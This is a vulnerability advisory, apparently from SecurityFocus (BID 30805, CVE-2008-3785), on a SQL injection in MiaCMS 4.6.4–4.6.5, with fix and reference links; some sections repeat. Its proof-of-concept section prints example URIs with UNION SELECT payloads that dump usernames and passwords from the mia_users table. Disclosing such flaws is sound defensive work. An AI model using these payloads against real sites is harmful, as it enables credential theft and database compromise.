MiaCMS 'mod_socialbits.php' SQL Injection Vulnerability
BID:30805
Info
MiaCMS 'mod_socialbits.php' SQL Injection Vulnerability
| Bugtraq ID: | 30805 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3785 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 24 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | ~!Dok_tOR!~ |
| Vulnerable: |
MiaCMS MiaCMS 4.6.5 MiaCMS MiaCMS 4.6.4 |
| Not Vulnerable: | |
Discussion
MiaCMS 'mod_socialbits.php' SQL Injection Vulnerability
MiaCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions up to and including MiaCMS 4.6.5 are vulnerable.
MiaCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions up to and including MiaCMS 4.6.5 are vulnerable.
Exploit / POC
MiaCMS 'mod_socialbits.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs have been provided:
http://www.example.com/index.php?option=com_content&task=view&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=9
http://www.example.com/index.php?option=com_content&task=category&sectionid=doktor&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=27
http://www.example.com/index.php?option=com_content&task=blogsection&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=9
Attackers can use a browser to exploit this issue.
The following example URIs have been provided:
http://www.example.com/index.php?option=com_content&task=view&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=9
http://www.example.com/index.php?option=com_content&task=category&sectionid=doktor&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=27
http://www.example.com/index.php?option=com_content&task=blogsection&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=9
Solution / Fix
MiaCMS 'mod_socialbits.php' SQL Injection Vulnerability
Solution:
The vendor has released an update. Please see the references for more information.
MiaCMS MiaCMS 4.6.5
Solution:
The vendor has released an update. Please see the references for more information.
MiaCMS MiaCMS 4.6.5
-
MiaCMS MiaCMS_v4.6.5_SecurityPatch_1
http://miacms.googlecode.com/files/MiaCMS_v4.6.5_SecurityPatch_1.zip
References
MiaCMS 'mod_socialbits.php' SQL Injection Vulnerability
References:
References:
- MiaCMS 4.6.5 Security Patch 1 Released (MiaCMS)
- MiaCMS Homepage (MiaCMS)
- MiaCMS Recent Security Report (MiaCMS)